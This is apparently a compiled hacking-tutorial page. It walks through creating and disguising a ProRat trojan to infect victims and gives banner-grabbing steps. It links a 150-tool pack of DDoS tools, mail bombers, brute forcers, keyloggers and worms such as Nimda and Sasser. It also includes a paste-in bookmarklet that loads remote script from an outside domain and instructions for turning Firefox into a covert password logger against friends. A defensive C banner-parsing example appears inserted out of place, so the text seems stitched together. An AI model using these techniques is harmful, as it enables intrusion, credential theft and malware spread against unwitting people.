1. Download ProRat. Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be “pro”.

2. Open up the program.


3. Next we will create the actual Trojan file. Click on Create and choose Create ProRat Server.

4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.



5. Click on the General Settings button to continue. Here we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.



6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. In the example I will use an ordinary text document.


7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I will stick with the default because it has icon support, but .exe files look suspicious, so it would be smart to change it.



8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.


9. Finally click on Create Server to, you guessed it, create the server file.


10. A hacker would probably rename it to something like “Funny Joke” and send it as an attachment to some people. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.
11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.
12. I’m going to run the server on my own computer to show you what would happen. Once I run it the trojan will be installed onto my computer in the background. The hacker would then get a message telling him that I was infected. He would then connect to my computer by typing in my IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to my computer and have full control over it.


13. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all my computer files, he can shut down my pc, get all the saved passwords off my computer, send a message to my computer, format my whole hard drive, take a screen shot of my computer, and so much more.


A hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.

BANNER GRABBING

Now that the hacker has a full list of services running on the target system, to be able to exploit them, he has to first figure out what software and version the service is. One way the hacker can get this information, is to telnet into service port. In the example below, we will use command prompt on Windows (Start -> Run -> Type “cmd” -> Enter). If you are on a Mac, you will be using the terminal. Note: If you are using Windows Vista, then telnet is not installed by default. You can install it by doing the following simple steps.

o Click Start then select Control Panel.
o Select Programs and Features.
o Select Turn Windows features on or off.
o Select the Telnet Client option and click OK.
o A box will appear to confirm installation. The telnet command should now be installed.


1. First, the hacker would choose one of the open ports that were revealed in the Nmap scan to continue with and attempt to exploit. Let’s say that when the hacker scanned his target, he found the port 21 open. As you can see on the chart above, port 21 is FTP. To find out what FTP software is running he would use telnet by running the command:
telnet www.targetsite.com 21



I ran this against my computer (localhost). So a hacker would insert a target URL in place of localhost.

2. Next, it would connect to the target and display a banner telling the hacker the software and its version as shown below. This is the information the hacker needs to continue and begin searching for vulnerabilities for the software discovered.


If the above method doesn’t work for you, then simply use Nmap’s full version detection option to get the information.
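The banner that the telnet step above reveals to an attacker is equally visible to the server's own administrator, so checking what your service announces is a cheap audit. As an added example (not from the book excerpt or from any FTP server's code), here is a small C parser for FTP greeting lines that pulls out the reply code, the product name and any version token; the struct and function names are this example's own, and the sample greetings are constructed:

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Parsed view of an FTP greeting such as "220 ProFTPD 1.3.3 Server ready".
 * Type and field names are this example's own, not from any library. */
struct ftp_banner {
    int  code;          /* 3-digit reply code, -1 when the line is not a reply */
    char product[32];   /* first word after the code, "" if none */
    char version[32];   /* first dotted-numeric token, "" if none */
};

/* A token "looks like a version" when it is digits with at least one '.'. */
static int looks_like_version(const char *tok)
{
    int dots = 0, digits = 0;
    for (; *tok != '\0'; tok++) {
        if (isdigit((unsigned char)*tok))
            digits++;
        else if (*tok == '.')
            dots++;
        else
            return 0;
    }
    return digits > 0 && dots > 0;
}

/* Parse one greeting line. RFC 959 replies start with three digits followed
 * by a space (or '-' for a multi-line reply). Returns 0 on success, -1 if the
 * line is not a reply at all (e.g. a connection error from the client). */
int parse_ftp_banner(const char *line, struct ftp_banner *out)
{
    out->code = -1;
    out->product[0] = out->version[0] = '\0';
    if (strlen(line) < 4 ||
        !isdigit((unsigned char)line[0]) || !isdigit((unsigned char)line[1]) ||
        !isdigit((unsigned char)line[2]) || (line[3] != ' ' && line[3] != '-'))
        return -1;
    out->code = (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');

    /* Walk the text after the code, splitting on spaces and parentheses so
     * that "(vsFTPd 2.3.4)" yields the tokens vsFTPd and 2.3.4. */
    const char *p = line + 4;
    int first = 1;
    while (*p != '\0' && *p != '\r' && *p != '\n') {
        if (*p == ' ' || *p == '(' || *p == ')') {
            p++;
            continue;
        }
        const char *start = p;
        while (*p != '\0' && strchr(" ()\r\n", *p) == NULL)
            p++;
        char tok[64];
        size_t len = (size_t)(p - start);
        if (len >= sizeof tok)
            len = sizeof tok - 1;
        memcpy(tok, start, len);
        tok[len] = '\0';
        if (first) {
            snprintf(out->product, sizeof out->product, "%s", tok);
            first = 0;
        }
        if (out->version[0] == '\0' && looks_like_version(tok))
            snprintf(out->version, sizeof out->version, "%s", tok);
    }
    return 0;
}

/* Audit helper: 1 if the greeting leaks a version number, else 0. */
int banner_discloses_version(const char *line)
{
    struct ftp_banner b;
    if (parse_ftp_banner(line, &b) != 0)
        return 0;
    return b.version[0] != '\0';
}

int main(void)
{
    /* Constructed sample greetings, not captured from any real host. */
    const char *samples[] = {
        "220 ProFTPD 1.3.3 Server (Debian) [::ffff:127.0.0.1]\r\n",
        "220 (vsFTPd 2.3.4)\r\n",
        "220 FTP server ready.\r\n",
    };
    for (size_t i = 0; i < 3; i++) {
        struct ftp_banner b;
        parse_ftp_banner(samples[i], &b);
        printf("code=%d product=%s version=%s leaks=%d\n", b.code, b.product,
               b.version[0] ? b.version : "(none)", banner_discloses_version(samples[i]));
    }
    return 0;
}
```

Feed it the first line your own server returns on port 21; a greeting that parses with an empty version field gives the attacker's "banner grabbing" step nothing to search for, which is why the text falls back to Nmap's version detection when the banner is silent.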

OFFENSIVE TOOLS


This package contains many applications but its main focus is on “Denial of Service” on HTTP servers.
Click here to download.
Password = chloe
Please view the readme.txt

http://bit.ly/k11swm

ALL IN ONE HACKING SOFTWARES TOOLS PACK – DOWNLOAD

Hello friends, today I am introducing to you an ultra hacker kit special; it consists of more than 150 working hacking tools.
Note: This material is posted for educational purposes only!
Hacking in any form is punishable offense. This material may be used by you only for the study of vulnerabilities, and nothing more.

This Package Includes:
AddrView
AddrView gives you the ability to analyze HTML pages and extract most of the URL addresses contained in them. AddrView retrieves the URLs of images (img tag), links to other files (a tag), CSS files, frames, Flash files and more. You can save the extracted address list to text, HTML or XML files, or add these addresses to your favorites.


AnonFTP
This package contains the /var/ftp area for anonymous FTP access.

AppToService
The program lets you run regular applications as a Windows service from the command line.
However, installing any application as a service can be done completely free of charge; it is enough to follow the recommendations from the Windows XP FAQ.

arpinject
Any computer on the network can easily be made to send an ARP reply packet and thereby alter the ARP table. Such an attack is called ARP poisoning; its result is that traffic is redirected to the desired host. The packet(s) can be sent programmatically using the ARPInject tool.

aspack21
A very nice packer for *.exe and *.dll files (in some cases the compression ratio is 70%). In addition, the program is good (especially for programmers trying to protect their work) at making it hard to extract the compressed file. As I understand it, ASPack is itself packed with ASPack. It is also nice that the program lets you test the “prepackaged” exe file before the final packing and, if its normal operation is broken, uncompress it.
The new version has improved packing speed and adds a “maximum compression” option. Unregistered, the program runs for 30 days. The interface is multilingual, including Russian.

bios_pass_remover
Remove BIOS password

brutus
Brute-forcer (unclear for which service)

Cable Modem Sniffer
Traffic interceptor for cable modems

CapKeys_DIGITAL
Key update simply via the internet. Can be saved as SofCam.key and as a text file.

CGI Founder v1.043
Program for finding holes in CGI scripts.

CGISscan
Scanner for CGI scripts

cports
Viewing connections and listening ports on your computer

craagle
Program for the automated search of serial numbers and keygens across many relevant archives.

CreditCardGjenerator

DeepUnFreez
“Makes computing environments easier to manage and maintain. Every Restart destroys all changes and reboots the computer to its original state, right down to the last byte”

E-mail Cracker
Recovers forgotten mailbox passwords that are stored in the e-mail client. The program emulates a POP3 server, and the password is sent back to the user. It supports any POP3 e-mail client.

ezDataBase_Defacer
Defacer for the ezDataBase engine.

FTP Brute Forcer
FTP brute-forcer.

ftpbr
FTP brute-forcer.

~ Censored ~ Mail Bomber 2.3
Mail bomber.

G00B3RS_phpBB_exploit_pack
Pack of exploits for the phpBB engine.

Google_Hacker_1.2
Utility to help with queries from the Google hacking series.

grinder1.1
Helps you find, within a specified range of IP addresses, the items listed in a file.

HackersAssistant
Software package for a hacker: Port Scanner, Ping Flooder, Server Slower, Connections, File Cleaner, Get Passwords, IP Validator, Web Browser, Ip Information, HTML Stealer, Site IP Retrieval, Winsock Scanner, exe Corruptor, Nuker, Hit Increaser, File Generator, Anonymous e-mail, Whois, Binary

HackTheGame
HackTheGame is a game that simulates the life of a hacker. You take on the role of a hacker who, for who knows what reasons, breaks into systems, gets into showdowns with hacking portals and, in general, lives a long and merry life. The main thing is not to get caught, which would be bad.

Hotmail Email Hacker / Hotmail HAcker Gold / Hotmail ScamPage / HotmailHack
In my opinion this is some sort of nonsense; I did not run it for long. Hotmail is not that easy to hack.

hydra-4.6-win
THC-Hydra: a threaded password cracker for various services (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO, etc.) for UNIX platforms. With this tool you can attack several services at once.

iecv
Internet Explorer Cookies View

ipnetinfo
A program that displays information about an IP address: the country, the domain owner, the range of available IP addresses, contact information and much more. It is useful, for example, when you need to know the origin of mail received from an unknown sender: simply copy the message headers from your e-mail program into IPNetInfo. It extracts all IP addresses from the text itself and performs the necessary lookups. The software queries several Whois servers, maximizing the result of the search for a given network address. Among other things, it can create an HTML report that stores all the gathered information about the selected IP addresses.

john-17w
A password cracker, currently available for UNIX, DOS and Win32. Its main aim is to detect weak UNIX passwords. A collection of word lists of over 600 MB can be bought for the program; it greatly simplifies password guessing.

Key Changer
Commercial ($8.00), free of trojans, designed to find and change the Windows XP product key, for example after a failed piracy/validity check (if any). After launch, XP Key Changer finds the current key, as well as the name and organization registered in Windows XP. XP Key Changer lets you change the XP product key and all of this information with one click on any machine. Works with all service packs, including Windows XP SP3!

Key_Logger
Keylogger :)

Legion NetBios Scanner v2.1
NetBIOS resource scanner.

Mail Boomb_2.0 YAHOO
Yahoo mail bomber.

MooreR Port Scanner
Port scanner for remote machines.

MSN Flooder 2.0
MSN Messenger flooder.

NET BIOS Scanner
NetBIOS resource scanner.

NetBIOS Name Scanner
NetBIOS resource scanner.

NetResView
NetBIOS resource scanner.

NFO Maker 1.0
This plugin is for viewing nfo and diz files, which are usually found in downloaded archives.
Warning: as reported by the author, "Unfortunately there was an unfortunate mistake concerning the Setting.reg file in the archive with the plugin. The Setting.reg file can be downloaded separately here: http://issoft.narod.ru/downloads/setting.reg"

Nimda
"Nimda" is an Internet worm that spreads over the Internet as an e-mail attachment, over local area networks, and by penetrating unprotected IIS servers. The worm's original host file is named README.EXE; it is a Windows PE EXE program about 57 kilobytes in size, written in Microsoft C++.

NTPacker
File packer.

On-Off MSN
Some sort of on/off switch for MSN.

PCAnyPass
PCAnywhere PassView: reveals passwords hidden behind asterisks.

Php Nuke Hacker v11.0
Cracker for the PHP-Nuke engine.

phpBB Annihilator / phpbb attack / phpbb bruteforcer / PhpBB pass extractor / phpBB_DoS / phpbb_spammer / phpBBAttacker / phpBBcracker
A set of tools for hacking, spamming, flooding, DDoSing and brute-forcing phpBB.

PhpBuGScan
Scanner for bugs in PHP scripts.

Ping & Nukes
Pinger / nuker.

Listener XP
The program monitors network ports on your system and pops up a window when someone tries to access a port. It writes a log file of the IP addresses of connecting clients and asks your permission before allowing the connection. You can enter port numbers of your choice, or the program will offer you a default list. The program runs from the system tray.

pqwak2
This program is for guessing network passwords. It quite quickly picks up the password for the specified network drive.

procexp
PROCEXP displays information about processes, the dynamic libraries they load and their properties. This makes PROCEXP a powerful tool for understanding the internal behaviour of applications, such as tracing handle and DLL leaks and version mismatches, and even for indirectly detecting viruses.

ProxyPro
Scan, ping, proxy switches

rainbowcrack-1.2-src win-lin
The program lets you create pregenerated LanManager hash tables, with which you can crack almost any alphanumeric password almost instantly.

Remote Shut Down
Shuts down a remote machine.

ResHacker
Edits exe and dll files; much in them can be changed. With this program you can easily Russify a program.

RpcScan101
Network port scanner

Sasser
The Sasser virus resembles Lovesan (Blaster), which exhausted millions of Internet users worldwide in summer 2003. It already has several modifications, which experts say are even more harmful than the original. Likewise according to experts, this virus does not threaten your hard drive, but only prevents you from using the machine fully. Its distinctive features: a message appears when trying to connect to the IP address of another computer, together with the error message "LSA Shell (Export version)", followed by a restart of the computer because of a fatal error in the lsass.exe process.

SendMailer
Sends a message in HTML format and in any encoding without a mail client. Checks that mandatory fields are filled in. Checks e-mail addresses for correctness (syntax). Converts special characters into HTML format. Lets you specify multiple addresses to choose from. Checks that the message was sent and reports errors. Can send a copy to the sender. Very easy to configure. Also fits easily into any design. Gives ample opportunity to hide the real address. If desired, sends information about the browser and the IP address.

Server 2003 Keygen
keygen for WINDOWS 2003 server

Server Killer
Server killer :)

showpassv10
Reveals passwords hidden behind asterisks.

sitedigger2
The program searches Google's cache for potential vulnerabilities, errors and configuration problems on web sites. In the new version you can use FSDB / GHDB and get 10 results for each signature. A large number of new signatures have been added: open webcams, credit card numbers, etc.

SMBdie
WinNuke is back! This exploit completely kills a WinNT/2K/XP/.NET machine running the Network Share Provider (works on port 139 and/or 445). It uses a malformed SMB (Server Message Block) packet and works anonymously; no account is needed, only the IP address and computer name.

SQLScan v1.0
Utility for guessing the password to Microsoft SQL Server. Lets you scan a range of IP addresses. When the password is found, it creates an NT account with a blank password on the vulnerable system.

Stealth – HTTP Scanner v1.0 build 23
A powerful tool for auditing web server security; it checks for more than 19,000 vulnerabilities.

SuperScan4
Port scanner with a bunch of utilities. Also includes a useful utility that pulls everything available out of (Windows) computers using a null session.

tftpd32.273
A small freeware program that includes easy-to-configure DHCP, TFTP, SNTP and Syslog servers as well as a TFTP client.

traceroute
A utility program for identifying routes in TCP/IP data networks.

udpflood
UDP packet sender. A tool that floods a specified IP and port with UDP packets. Used to test the stability of network services under a UDP flood. Packets can be specified by the user or be completely random.

Ultra Dos
Program for DDoS against a remote machine.

WebCracker 4.0
A neat program for guessing passwords for web sites.
and much more…

Hotfile
Fileserve

WOPHCRACK – AN OPHCRACK WEB INTERFACE

Rainbow tables are really useful when cracking password hashes. One disadvantage of these tables is their size, which can reach tens or even hundreds of gigabytes. Making use of them is also hard, as it takes quite a long time to go through the whole content of a table. Hence there are tools like Ophcrack for Windows that help crack Windows passwords with rainbow tables.

We really liked the Offensive security Crackpot online hash cracker and thought it would be really nice to have a web interface for our rainbow tables that we could access from anywhere without having to carry them with us!

Download here: WOPHCRACK

CROSS_FUZZ – A CROSS DOCUMENT DOM BINDING FUZZER

Cross_fuzz is an amazingly effective but notoriously annoying cross-document DOM binding fuzzer that helped identify about one hundred bugs in all browsers on the market, many of them exploitable, and it is still finding more…

Download it from here: cross_fuzz

HOW TO REMOVE SURVEYS & OFFERS FROM WEB PAGES


COPY THIS CODE, PASTE IT INTO YOUR BROWSER'S ADDRESS BAR AND PRESS ENTER:

javascript:(function(){(function(){var z=["Timeout","Interval"];for(var i=0;i<1;i++){var x=window["set"+z[i]]("null",1);eval("delete clear"+z[i]);if (window["clear"+z[i]]==undefined){if (typeof(ar)=="undefined"){var ar=document.createElement("iframe");ar.style.display="none";document.body.appendChild(ar);}window["clear"+z[i]]=ar.contentWindow["clear"+z[i]];}for(var j=x;j>0&&x-j<99999;j--)window["clear"+z[i]](j);}})();var bd="http://survey-remover.com/";var gn=function(){var q=function(min,max){return Math.floor(Math.random()*(max-min+1))+min;};var n="";for(var r=0;r<q(9,19);r++)n+=String.fromCharCode(q(97,122));return n;};var sj=["Timeout","Interval"];var bl=[];var xc=[];for(var i=0;i<2;i++){bl.push(window["set"+sj[i]]);window["set"+sj[i]]=function(a,b){};for(var j in window){try{if(typeof(window[j])=="function"){if((window[j]+"").indexOf("function set"+sj[i]+"() {")!=-1)window[j]=function(a,b){};}}catch(e){}}var op=gn();xc.push(op);window[op]=bl[i];}var er=gn();window[er]=function(){window.setTimeout=bl[0];window.setInterval=bl[1];xjz={version:"2.0",domain:"http://survey-remover.com/",id:"4dd59e37064d7",TO:setTimeout("alert(\"It appears that the host could not be reached \nPlease try to use the bookmarklet again later!\n\"+xjz.domain);",10000)};var a=document.createElement("script");a.type="text/javascript";a.src=xjz.domain.replace("//","//public.")+"remover/";a.onload=function(){xjz.surveyRemover=new xjz.SurveyRemover(xjz.version);xjz.surveyRemover.init();};document.documentElement.firstElementChild.appendChild(a);};window[xc[0]](window[er],110);})();

OR VISIT http://survey-remover.com/ AND DOWNLOAD THE TOOLS…

HOW TO TURN YOUR MOZILLA FIREFOX INTO A KEYLOGGER

How we can turn our Mozilla Firefox into an undetectable keylogger. This keylogger will store all the usernames and passwords entered by the user, so that you can hack, or audit for ethical reasons, your friends' accounts.


No additional software or tool is required; you just need to replace one existing file.
Steps to turn your Firefox into a keylogger:
Close Firefox if it is open.
Go to: Windows - C:/Program Files/Mozilla Firefox/Components
Find the script named "nsLoginManagerPrompter.js".
Click here to download the file, unzip it, and simply overwrite the existing nsLoginManagerPrompter.js with it; it has already been edited to save all usernames and passwords without prompting the user.
From now on, when someone logs on to any site, their username and password will be saved automatically, without a prompt!


To retrieve the account information, make sure Firefox is open, go to Tools > Options > Security tab, click on Saved Passwords, then click on Show Passwords and press Yes…

WHAT IS GREASEMONKEY


https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/

Greasemonkey is a Mozilla Firefox extension that allows users to install scripts that make on-the-fly changes to HTML web page content on the DOMContentLoaded event, which happens immediately after it is loaded in the browser (also known as augmented browsing).

As Greasemonkey scripts are persistent, the changes made to the web pages are executed every time the page is opened, making them effectively permanent for the user running the script.

Greasemonkey can be used for adding new functions to web pages (for example, embedding price comparisons within shopping sites), fixing rendering bugs, combining data from multiple webpages, and numerous other purposes.